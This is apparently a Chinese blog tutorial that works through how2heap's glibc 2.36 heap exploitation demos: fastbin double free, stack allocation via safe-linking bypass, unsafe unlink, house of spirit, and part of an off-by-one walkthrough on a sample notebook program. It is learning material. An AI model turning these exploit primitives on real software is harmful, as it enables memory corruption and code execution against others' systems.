how2heap全系列(持续更新)

在此记录学习how2heap的过程。感谢shellphish的 how2heap 项目。

本文基于commit b4e4e487fd913d072b616713feb9f5e7a1e53873 ,glibc 2.36,相比于之前的版本代码可能会复杂一点。

需要的前置知识:

  1. csapp malloc lab :对内存管理的理解有很大的帮助

  2. glibc的ptmalloc的大概了解 需要知道chunk的结构,针对不同大小的chunk有哪些管理方式

    /*
      This struct declaration is misleading (but accurate and necessary).
      It declares a "view" into memory allowing access to necessary
      fields at known offsets from a given base. See explanation below.
    */
    struct malloc_chunk {
    
      INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
      // 如果前一个 chunk 是空闲的,该域表示前一个 chunk 的大小,如果前一个 chunk 不空闲,该域无意义。
      INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
      // 当前 chunk 的大小,并且记录了当前 chunk 和前一个 chunk 的一些属性性,包括前一个 chunk 是否在 
      // 使用中,当前 chunk 是否是通过 mmap 获得的内存,当前 chunk 是否属于非主分配区。
    
      struct malloc_chunk* fd;         /* double links -- used only if free. */
      struct malloc_chunk* bk;
      /*
      指针 fd 和 bk 只有当该 chunk 块空闲时才存在,其作用是用于将对应的空闲 chunk 块加入到
      空闲 chunk 块链表中统一管理,如果该 chunk 块被分配给应用程序使用,那么这两个指针
      也就没有用(该 chunk 块已经从空闲链中拆出)了,所以也当作应用程序的使用空间,而不至于浪费。
      */
    
      /* Only used for large blocks: pointer to next larger size.  */
      struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
      struct malloc_chunk* bk_nextsize;
      /*
      当当前的 chunk 存在于 large bins 中时,large bins 中的空闲
      chunk 是按照大小排序的,但同一个大小的 chunk 可能有多个,增加了这两个字段可以加快
      遍历空闲 chunk,并查找满足需要的空闲 chunk,fd_nextsize 指向下一个比当前 chunk 大小
      大的第一个空闲 chunk,bk_nextszie 指向前一个比当前 chunk 大小小的第一个空闲 chunk。
      如果该 chunk 块被分配给应用程序使用,那么这两个指针也就没有用(该 chunk 块已经从 size
      链中拆出)了,所以也当作应用程序的使用空间,而不至于浪费。
      */
    };
    

    注释参考了《Glibc 内存管理 Ptmalloc2 源代码分析 华庭(庄明强)》

    注意chunk结构体的成员,低位在低地址,高位在高地址

  3. 分箱式内存管理

    对于空闲的 chunk,ptmalloc 采用分箱式内存管理方式,根据空闲 chunk 的大小和处于 的状态将其放在四个不同的 bin 中,这四个空闲 chunk 的容器包括 fast bins,unsorted bin,small bins 和 large bins。

    Fast bins 是小内存块的高速缓存,当一些大小小于 64 字节的 chunk被回收时,首先会放入 fast bins 中,在分配小内存时,首先会查看 fast bins 中是否有合适的内存块,如果存在,则直接返回 fast bins 中的内存块,以加快分配速度。

    Usorted bin 只有一个,回收的 chunk 块必须先放到 unsorted bin 中,分配内存时会查看 unsorted bin 中是否有合适的 chunk,如果找到满足条件的 chunk,则直接返回给用户,否则将 unsorted bin 的所有 chunk 放入 small bins 或是 large bins 中。

    Small bins 用于存放固定大小的 chunk,共 64 个bin,最小的 chunk 大小为 16 字节或 32 字节,每个 bin 的大小相差 8 字节或是 16 字节,当分配小内存块时,采用精确匹配的方式从 small bins 中查找合适的 chunk。

    Large bins 用于存储大于等于 512B 或 1024B 的空闲 chunk,这些 chunk 使用双向链表的形式按大小顺序排序,分配内存时按最近匹配方式从 large bins 中分配 chunk。

  4. 编译选项

    在学习的时候可以关闭ASLR、PIE等,这样每次运行的结果都是一样,容易复现,另外编译使用-g选项来使gdb可以显示源码

    # sysctl -w kernel.randomize_va_space=0
    $ gcc xxx.c -o xx -O0 -g -z execstack -z norelro -fno-stack-protector -no-pie
    

first fit

This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.

first fit并不是一种利用方式,而是介绍glibc的选择空闲块的策略。

glibc使用first-fit的策略选择空闲块,遍历chunk列表时,如果一个chunk是free的而且满足大小要求,glibc就会选择这个块。

代码请见 how2heap/first_fit.c at master · shellphish/how2heap (github.com)

image-20230318212704999

运行结果可以验证这一点。

calc_tcache_idx

This file doesn't demonstrate an attack, but calculates the tcache idx for a given chunk size.

和上面的一样,这里给出了计算chunk位于tcache的index的方式。

The basic formula is as follows:
	IDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT
	On a 64 bit system the current values are:
		MINSIZE: 0x20
		MALLOC_ALIGNMENT: 0x10
	So we get the following equation:
	IDX = (CHUNKSIZE - 0x11) / 0x10

BUT be AWARE that CHUNKSIZE is not the x in malloc(x)
It is calculated as follows:
	IF x + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE(0x20) CHUNKSIZE = MINSIZE (0x20)
	ELSE: CHUNKSIZE = (x + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) 
	=> CHUNKSIZE = (x + 0x8 + 0xf) & ~0xf

fastbin_dup

Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist.

一个double-free的例子,连续malloc A、B、C 3个堆块,然后按顺序free A、B、A,然后调用3次malloc,结果会返回A、B、A这3个堆块。

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);

	printf("This file demonstrates a simple double-free attack with fastbins.\n");

	printf("Fill up tcache first.\n");
	void *ptrs[8];
	for (int i=0; i<8; i++) {
		ptrs[i] = malloc(8);
	}
	for (int i=0; i<7; i++) {
		free(ptrs[i]);
	}

	printf("Allocating 3 buffers.\n");
	int *a = calloc(1, 8);
	int *b = calloc(1, 8);
	int *c = calloc(1, 8);

	printf("1st calloc(1, 8): %p\n", a);
	printf("2nd calloc(1, 8): %p\n", b);
	printf("3rd calloc(1, 8): %p\n", c);

	printf("Freeing the first one...\n");
	free(a);

	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
	// free(a);

	printf("So, instead, we'll free %p.\n", b);
	free(b);

	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);

	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
	a = calloc(1, 8);
	b = calloc(1, 8);
	c = calloc(1, 8);
	printf("1st calloc(1, 8): %p\n", a);
	printf("2nd calloc(1, 8): %p\n", b);
	printf("3rd calloc(1, 8): %p\n", c);

	assert(a == c);

开头的两个for循环用于填充tcache,tcache的限制更多,我们暂时不接触。如果不填满tcache,我们在free的时候chunk就会被放入tcache,注意接下来使用的是calloc()而不是malloc(),这是因为calloc()不会去从tcache中查找堆块,这样能保证我们操作的chunk全部位于fastbin

fastbins 可以看成一个栈,使用单链表实现,通过 fastbin->fd 来遍历 fastbins。由于 free 的过程会对 free list 做检查,我们不能连续两次 free 同一个 chunk,所以这里在两次 free 之间,增加了一次对其他 chunk 的 free 过程,从而绕过检查顺利执行。然后再 malloc 三次,也就有了两个指向同一块内存区域的指针。

free的顺序需要注意,glibc有以下检查,连续free两次会被视为double-free,中间插入一次对其他chunk的free才能成功。

image-20230318223822151

fastbin_dup_into_stack

This file extends on fastbin_dup.c by tricking calloc into returning a pointer to a controlled location (in this case, the stack).

这个程序扩展了上一个程序,通过fastbin_dup使malloc返回一个free chunk的地址,再通过修改其fd指针实现伪造出新的free堆块(在栈上),可以实现修改栈上的内容。 如果更进一步修改 fd 指针,则能够实现任意地址分配堆块的效果 。

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n"
	       "returning a pointer to a controlled location (in this case, the stack).\n");


	fprintf(stderr,"Fill up tcache first.\n");

	void *ptrs[7];

	for (int i=0; i<7; i++) {
		ptrs[i] = malloc(8);
	}
	for (int i=0; i<7; i++) {
		free(ptrs[i]);
	}


	unsigned long stack_var[2] __attribute__ ((aligned (0x10)));

	fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var);

	fprintf(stderr, "Allocating 3 buffers.\n");
	int *a = calloc(1,8);
	int *b = calloc(1,8);
	int *c = calloc(1,8);

	fprintf(stderr, "1st calloc(1,8): %p\n", a);
	fprintf(stderr, "2nd calloc(1,8): %p\n", b);
	fprintf(stderr, "3rd calloc(1,8): %p\n", c);

	fprintf(stderr, "Freeing the first one...\n"); //First call to free will add a reference to the fastbin
	free(a);

	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);

	fprintf(stderr, "So, instead, we'll free %p.\n", b);
	free(b);

	//Calling free(a) twice renders the program vulnerable to Double Free

	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);

	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
		"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
	unsigned long *d = calloc(1,8);

	fprintf(stderr, "1st calloc(1,8): %p\n", d);
	fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8));
	fprintf(stderr, "Now the free list has [ %p ].\n", a);
	fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
		"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
		"so that calloc will think there is a free chunk there and agree to\n"
		"return a pointer to it.\n", a);
	stack_var[1] = 0x20;

	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
	fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
	fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
	unsigned long ptr = (unsigned long)stack_var;
	unsigned long addr = (unsigned long) d;
	/*VULNERABILITY*/
	*d = (addr >> 12) ^ ptr;
	/*VULNERABILITY*/

	fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8));

	void *p = calloc(1,8);

	fprintf(stderr, "4th calloc(1,8): %p\n", p);
	assert((unsigned long)p == (unsigned long)stack_var + 0x10);
}

这里我们在free掉a和b之后打下断点,顺便复习一下malloc chunk的结构:

/*
  This struct declaration is misleading (but accurate and necessary).
  It declares a "view" into memory allowing access to necessary
  fields at known offsets from a given base. See explanation below.
*/
struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

对于64位系统来讲,这个结构体的每个成员都是8字节的,对于fastbin来讲,没有用到后面的两个字段。

使用heap和fastbin命令查看分配情况,可见在fastbin中有两个空闲的堆块,且大小都是0x20字节,由于fastbin 是使用单链表来维护释放的堆块的,因此即使堆块被free掉,由于只有fd的信息,无法对bk堆块的PREV_INUSE位置0,所以可以看到下图中的size都是0x21

image-20230319114210945

查看堆块的内容,依次是prev_size(0), size(0x21), fd(指向前面的堆块), bk(0)。fastbins对于不同大小的堆块有不同的链表维护,因此prev_size位也不需要。

image-20230319115027016

这里大家可能会有疑问,0x404390块的fd地址不对啊?不是0x404370而是0x404774啊?这是由于glibc 2.32及以后的Safe Linking机制造成的,fd保存的并不是实际的前一个堆块的地址,而是(malloc_chunk->fd >> PAGE_SHIFT) ^ 目标地址,那么通过计算(0x4043a0 >> 12) ^ 0x404370 我们可以得到0x404774,也就是下面图片中的地址了。另外由于异或运算的特性,我们可以通过再次异或上面公式的前半部分来还原真实地址。

接下来我们再次free(a),可以得到以下:

image-20230319123032745

(0x404380 >> 12 )^ 0x404794可以得到0x404390,也就是上面的情况了,这样我们在fastbin中0x404370堆块便出现了 2 次。

接下来我们执行了unsigned long *d = calloc(1,8);,然后又调用了一次calloc,此时fastbin中的前两个堆块已被取出,剩下0x404370

image-20230319123342323

此时d的值就是0x404380,我们可以修改0x404370堆块的fd指针了,将其指向在栈上伪造的堆块

image-20230319123517572

	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
	fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
	fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
	unsigned long ptr = (unsigned long)stack_var;
	unsigned long addr = (unsigned long) d;
	/*VULNERABILITY*/
	*d = (addr >> 12) ^ ptr;
	/*VULNERABILITY*/

image-20230319123835383

此时调用calloc应当返回 &stack_var + 0x10


fastbin_dup_consolidate

和fastbin_dup类似,不同的是这里在free fastbin中的块之后申请了另外一个larger bin的堆块,导致触发了malloc_consolidate(),从而使p1不再是fastbin的第一个bin,实现了绕过double free检测。

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

void main() {
	// reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
	puts("This is a powerful technique that bypasses the double free check in tcachebin.");
	printf("Fill up the tcache list to force the fastbin usage...\n");

	void *ptr[7];

	for(int i = 0; i < 7; i++)
		ptr[i] = malloc(0x40);
	for(int i = 0; i < 7; i++)
		free(ptr[i]);

	void* p1 = calloc(1,0x40);

	printf("Allocate another chunk of the same size p1=%p \n", p1);
  	printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
  	free(p1);

  	void* p3 = malloc(0x400);
	printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
	printf("will trigger the malloc_consolidate and merge\n");
	printf("the fastbin chunks into the top chunk, thus\n");
	printf("p1 and p3 are now pointing to the same chunk !\n\n");

	assert(p1 == p3);

  	printf("Triggering the double free vulnerability!\n\n");
	free(p1);

	void *p4 = malloc(0x400);

	assert(p4 == p3);

	printf("The double free added the chunk referenced by p1 \n");
	printf("to the tcache thus the next similar-size malloc will\n");
	printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);
}

第一次free p1时可以看到其被放入了fastbin

image-20230319162117732

此时查看heap,可见p1与top chunk是相邻的。

image-20230319162207597

下面进行malloc操作,p1会与top chunk合并然后被返回,此时p1和p3的内容相同

image-20230319162547552

再次free p1,p1会被放入tcache,当再次申请大小接近的内存时,会返回p1(也就是p3),这样就返回了一个已经分配了的堆块。

image-20230319163237988

image-20230319163300167

Exploiting free on a corrupted chunk to get arbitrary write.

这个程序通过free一个伪造的堆块,实现了任意地址写。

利用条件是我们能够溢出当前堆块来修改其下一个堆块的内容。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>

uint64_t *chunk0_ptr;

int main()
{
	setbuf(stdout, NULL);
	printf("Welcome to unsafe unlink 2.0!\n");
	printf("Tested in Ubuntu 20.04 64bit.\n");
	printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
	printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");

	int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin
	int header_size = 2;

	printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");

	chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
	uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
	printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
	printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

	printf("We create a fake chunk inside chunk0.\n");
	printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\n");
	chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;
	printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
	chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
	printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
	printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
	chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
	printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
	printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);

	printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
	printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
	printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
	chunk1_hdr[0] = malloc_size;
	printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
	printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
	chunk1_hdr[1] &= ~1;

	printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
	printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
	free(chunk1_ptr);

	printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
	char victim_string[8];
	strcpy(victim_string,"Hello!~");
	chunk0_ptr[3] = (uint64_t) victim_string;

	printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
	printf("Original value: %s\n",victim_string);
	chunk0_ptr[0] = 0x4141414142424242LL;
	printf("New Value: %s\n",victim_string);

	// sanity check
	assert(*(long *)victim_string == 0x4141414142424242L);
}

整个程序主要变量的内存分布如下图:

image-20230822125534227

程序首先申请了两个大小为malloc_size的堆块,依次为 chunk0和chunk1。

然后我们在chunk0内部伪造一个堆块,chunk0的地址即为fake chunk的起始地址。

首先我们修改fake chunk的size为chunk0的size - 0x10字节,即29行的

chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;

然后修改fake chunk的fd为&chunk0_ptr-(sizeof(uint64_t)*3),以绕过 P->fd->bk != P的检查(使P->fd->bk等于fake chunk的地址),即31行的

chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);

同理,修改fake chunk的bk为&chunk0_ptr-(sizeof(uint64_t)*2),以绕过 P->bk->fd != P的检查(使P->bk->fd等于fake chunk的地址),即34行的

chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);

假定我们在chunk0_ptr处能实现溢出,所以我们可以随意修改chunk1的数据。

那么我们修改chunk1的prev_size为prev_size - 0x10,这样我们在free chunk1时,会认为其前一个堆块位于fake chunk。另外我们要修改chunk1的size字段的prev_inuse位。

此时free chunk1,我们构造的fake chunk就会被unlink。unlink的宏定义如下: https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344

1343 /* Take a chunk off a bin list */
1344 #define unlink(AV, P, BK, FD) {                                            \
1345     FD = P->fd;                                                               \
1346     BK = P->bk;                                                               \
1347     if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
1348       malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
1349     else {                                                                    \
1350         FD->bk = BK;                                                          \
1351         BK->fd = FD;                                                          \
1352         if (!in_smallbin_range (P->size)                                      \
1353             && __builtin_expect (P->fd_nextsize != NULL, 0)) {                \
1354             if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)        \
1355                 || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
1356               malloc_printerr (check_action,                                  \
1357                                "corrupted double-linked list (not small)",    \
1358                                P, AV);                                        \
1359             if (FD->fd_nextsize == NULL) {                                    \
1360                 if (P->fd_nextsize == P)                                      \
1361                   FD->fd_nextsize = FD->bk_nextsize = FD;                     \
1362                 else {                                                        \
1363                     FD->fd_nextsize = P->fd_nextsize;                         \
1364                     FD->bk_nextsize = P->bk_nextsize;                         \
1365                     P->fd_nextsize->bk_nextsize = FD;                         \
1366                     P->bk_nextsize->fd_nextsize = FD;                         \
1367                   }                                                           \
1368               } else {                                                        \
1369                 P->fd_nextsize->bk_nextsize = P->bk_nextsize;                 \
1370                 P->bk_nextsize->fd_nextsize = P->fd_nextsize;                 \
1371               }                                                               \
1372           }                                                                   \
1373       }                                                                       \
1374 }

由于我们的大小在smallbin的范围内,1352行以后的检查不会进行,1347行的检查已经被绕过。

等价代码如下:

FD = P->fd; // FD的值: &chunk0_ptr-(sizeof(uint64_t)*3)
BK = P->bk; // BK的值: &chunk0_ptr-(sizeof(uint64_t)*2)
FD->bk = BK // *(&chunk0_ptr-(sizeof(uint64_t)*3)+(sizeof(uint64_t)*3)) = BK
BK->fd = FD // *(&chunk0_ptr-(sizeof(uint64_t)*2)+(sizeof(uint64_t)*2)) = FD

这里是关键的地方,FD->bkBK->fd就是变量chunk0_ptr的地址(BSS段),最后一行的作用是将变量chunk0_ptr的内容改成其所在地址减去0x18。

这样chunk0_ptr[3](chunk0_ptr+0x18)就是变量chunk0_ptr自身的地址,这时我们可以用下面的语句修改变量chunk0_ptr指向的地址。

chunk0_ptr[3] = (uint64_t) victim_string;

然后我们就可以实现任意地址写:

chunk0_ptr[0] = 0x4141414142424242LL;

如果不明白可以看下面的代码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char victim_string[8];
	strcpy(victim_string,"Hello!~");
    printf("victim_string is at %p\n", &victim_string);

    char** ptr_array = malloc(sizeof(char*)*5);
    printf("ptr_array is at %p\n", &ptr_array);
    printf("ptr_array sotres %p\n", ptr_array);

    printf("&ptr_array[-3]: %p\n", &ptr_array[-3]);
    ptr_array = &ptr_array - 3;
    printf("ptr_array now stores %p\n", ptr_array);
    ptr_array[3] = victim_string;
    printf("ptr_array[3] now stores %p\n", ptr_array[3]);
    ptr_array[0] = 0x4141414142424242LL;
    printf("victim_string %s\n", victim_string);
    return 0;
}

house_of_spirit

Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer.

这个程序通过伪造一个堆块,然后将其free,这样在下次malloc时便会返回伪造的堆块。

适用于存在栈溢出但是无法溢出到返回地址,但是可以覆盖一个指向堆区域的指针,将其改写为指向栈上的fake chunk,这样free便能返回栈上的地址。

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);

	puts("This file demonstrates the house of spirit attack.");
	puts("This attack adds a non-heap pointer into fastbin, thus leading to (nearly) arbitrary write.");
	puts("Required primitives: known target address, ability to set up the start/end of the target memory");

	puts("\nStep 1: Allocate 7 chunks and free them to fill up tcache");
	void *chunks[7];
	for(int i=0; i<7; i++) {
		chunks[i] = malloc(0x30);
	}
	for(int i=0; i<7; i++) {
		free(chunks[i]);
	}

	puts("\nStep 2: Prepare the fake chunk");
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	long fake_chunks[10] __attribute__ ((aligned (0x10)));
	printf("The target fake chunk is at %p\n", fake_chunks);
	printf("It contains two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[9]);
	printf("This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	puts("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.");
	printf("Now set the size of the chunk (%p) to 0x40 so malloc will think it is a valid chunk.\n", &fake_chunks[1]);
	fake_chunks[1] = 0x40; // this is the size

	printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
	printf("Set the size of the chunk (%p) to 0x1234 so freeing the first chunk can succeed.\n", &fake_chunks[9]);
	fake_chunks[9] = 0x1234; // nextsize

	puts("\nStep 3: Free the first fake chunk");
	puts("Note that the address of the fake chunk must be 16-byte aligned.\n");
	void *victim = &fake_chunks[2];
	free(victim);

	puts("\nStep 4: Take out the fake chunk");
	printf("Now the next calloc will return our fake chunk at %p!\n", &fake_chunks[2]);
	printf("malloc can do the trick as well, you just need to do it for 8 times.");
	void *allocated = calloc(1, 0x30);
	printf("malloc(0x30): %p, fake chunk: %p\n", allocated, victim);

	assert(allocated == victim);
}

在free伪造的chunk时需要绕过一些检查:

  1. IS_MMAPED和NON_MAIN_AREANA位必须为0
  2. chunk size满足fast bin的大小
  3. next_chunk的大小需要大于2*SIZE_SZ且小于av->system_mem

效果:

image-20230403222402619

poison_null_byte

Exploiting a single null byte overflow.

适用场景:可以溢出到malloc chunk的下一个chunk,这里只能溢出为null,可以实现改小next chunk的size然后实现进一步利用。

这一节以 devel0pment.de Heap Exploitation: Off-By-One / Poison Null Byte – devel0pment.de 文章为例,从off by one一路走到getshell(部分图片同样引用自原文章)

环境是Ubuntu 16.04.7 LTS amd64,glibc 2.23-0ubuntu11.3(apt show libc6可查看当前libc版本)

示例程序的源代码如下:

/**
 *
 * heap.c
 *
 * sample program: heap off-by-one vulnerability
 * 
 * gcc heap.c -pie -fPIE -Wl,-z,relro,-z,now -o heap
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define DELETE 1
#define PRINT 2

void create();
void process(unsigned int);

char *ptrs[10];

/**
 * main-loop: print menu, read choice, call create/delete/exit
 */
int main() {

  setvbuf(stdout, NULL, _IONBF, 0);

  while(1) {
    unsigned int choice;
    puts("1. create\n2. delete\n3. print\n4. exit");
    printf("> ");
    scanf("%u", &choice);

    switch(choice) {
      case 1: create(); break;
      case 2: process(DELETE); break;
      case 3: process(PRINT); break;
      case 4: exit(0); break;
      default: puts("invalid choice"); break;
    }
  }
}


/**
 * creates a new chunk.
 */
void create() {

  unsigned int i, size;
  unsigned int idx = 10;
  char buf[1024];

  for (i = 0; i < 10; i++) {
    if (ptrs[i] == NULL) {
      idx = i;
      break;
    }
  }
  if (idx == 10) {
    puts("no free slots\n");
    return;
  }
  
  printf("\nusing slot %u\n", idx);

  printf("size: ");
  scanf("%u", &size);
  if (size > 1023) {
    puts("maximum size (1023 bytes) exceeded\n");
    return;
  }

  printf("data: ");
  size = read(0, buf, size);
  buf[size] = 0x00;
  
  ptrs[idx] = (char*)malloc(size);
  strcpy(ptrs[idx], buf);

  puts("successfully created chunk\n");
}


/**
 * deletes or prints an existing chunk.
 */
void process(unsigned int action) {

  unsigned int idx;
  printf("idx: ");
  scanf("%u", &idx);

  if (idx > 10) {
    puts("invalid index\n");
    return;
  }

  if (ptrs[idx] == NULL) {
    puts("chunk not existing\n");
    return;
  }

  if (action == DELETE) {
    free(ptrs[idx]);
    ptrs[idx] = NULL;
    puts("successfully deleted chunk\n");
  }
  else if (action == PRINT) {
    printf("\ndata: %s\n", ptrs[idx]);
  }

}

程序类似CTF中的notebook程序,运行输出如下:

xerus@xerus:~``/pwn/heap``$ .``/heap
1. create
2. delete
3. print
4. exit
> 
> 1
 
using slot 0
size: 40
data: AAAAAAAAAAAAAAAAAAAAAAAAA
successfully created chunk
> 3
idx: 0
 
data: AAAAAAAAAAAAAAAAAAAAAAAAA
> 3
idx: 0
 
data: AAAAAAAAAAAAAAAAAAAAAAAAA

通过分析程序的代码我们可以知道在 create 时会有off by one:

printf("data: ");
size = read(0, buf, size);
buf[size] = 0x00; 
 
ptrs[idx] = (char*)malloc(size);
strcpy(ptrs[idx], buf); // off by one

漏洞源于strcpy操作,由于strcpy会复制字符串结尾的\0,此时我们可以溢出到其下一个chunk的size字段(ptmalloc2使用了边界标记法,malloc chunk的prev_size字段其实是在前一个个chunk的尾部保存的,所以我们可以修改size字段)。

调用两次malloc来验证边界标记法:

...
  char *ptr = malloc(0x88);
  char *ptr2 = malloc(0x28);
...

img

将chunk1用字符A填满:

...
  char *ptr = malloc(0x88);
  char *ptr2 = malloc(0x28);
  for (int i = 0; i < 0x88; i++) ptr[i] = 'A';
...

img

当chunk1被free时,chunk1的FD和BK字段被设置,chunk2的prev_size被设置,prev_inuse位被置0:

...
  char *ptr = malloc(0x88);
  char *ptr2 = malloc(0x28);
  for (int i = 0; i < 0x88; i++) ptr[i] = 'A';
  free(ptr);
...

img

此时smallbins 如下:

img

如果我们free掉一个chunk,那么这个chunk会被插入到双向链表的头结点,如下:

img

即:

img

fastbins则有所不一样,插入同样是头插法,但是malloc是取最前面的节点:

img

为了实现getshell,我们需要泄露libc的地址,而bins的头或尾节点的指针会指向main_arena(fastbins除外)。通过伪造堆块我们可以实现这个目的。

为了伪造重叠的chunks,我们需要先创建一些堆块:

create(0xf8, 'A'*0xf8) # chunk_AAA, idx = 0
create(0x68, 'B'*0x68) # chunk_BBB, idx = 1
create(0xf8, 'C'*0xf8) # chunk_CCC, idx = 2
create(0x10, 'D'*0x10) # chunk_DDD, idx = 3

内存分布如图:

img

  • **chunk_AAA** 是free的堆块,用作合法的空闲堆块
  • **chunk_BBB** 是存在off by one漏洞 的堆块
  • **chunk_CCC**的prev_inuse位会被清除,prev_size被设置为chunk_AAA+chunk_BBB的size
  • **chunk_DDD** 是fastbin chunk,唯一的作用是防止free chunk和top chunk合并

首先free chunk_AAA:

# chunk_AAA will be a valid free chunk (containing libc-addresses in FD/BK)
delete(0)

